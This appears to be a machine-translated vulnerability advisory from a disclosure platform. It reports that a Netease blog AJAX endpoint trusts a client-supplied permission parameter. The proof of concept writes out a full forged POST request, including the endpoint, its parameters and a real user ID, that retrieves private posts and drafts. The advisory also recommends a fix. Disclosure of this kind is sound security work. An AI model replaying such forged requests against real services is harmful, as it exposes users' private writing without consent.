Netease blog permission check is lax, causing leakage of encrypted logs and drafts in blogs

Brief description: this vulnerability can cause leakage of encrypted logs (friend visibility, private visibility) and draft logs in users' blogs.
Detailed Description: The AJAX request interface of Netease blog Log Module transmits the user level (visitor, friend, and blogger) through URL parameters, and does not judge this parameter, by forging a request, you can immediately obtain logs that are only visible to friends or the bloggers. In addition, in any case, this interface returns the logs saved as drafts, which are not displayed only by the front-end judgment.
Proof of vulnerability: Taking blog Small tube (http://blog.163.com/blog_admin) as an example. You can obtain the UID 721279 on the homepage.
 
Initiate an http post request to the following address:
Http://api.blog.163.com/dwr/call/plaincall/BlogBean.getBlogs.dwr
 
POST parameters:
 
CallCount = 1
 
ScriptSessionId =$ {scriptSessionId} 187
 
C0-scriptName = BlogBean
 
C0-methodName = getBlogs
 
C0-id = 0
 
C0-param0: Numbers = 260
 
C0-param1: number = 20
 
C0-param2: Numbers = 721279
 
C0-param3: boolean = false
 
C0-param4: Numbers = 10000
 
C0-param5: boolean = false
 
C0-param6: boolean = false
 
BatchId = 1, 687303
 
Here, param0 and param1 are the numbers and starting points respectively (only the 260-280 logs are obtained here), param2 is the UID, param4 is the permission, and 10000 represents the blogger (highest level ).
 
The returned data is the data encapsulated by JSONP. After simple parsing, you can find that one of the headers (titles) that are not displayed in the log list is "post real, show the story-blog selfie star. Its address is ghost.
Solution: BlogBean. getBlogs. dwr is the AJAX interface in the old blog version. The new version has been upgraded to BlogBeanNew. getBlogs. dwr and does not have this vulnerability. We recommend that you delete the old interface.


Author XiNGRZ @ wooyun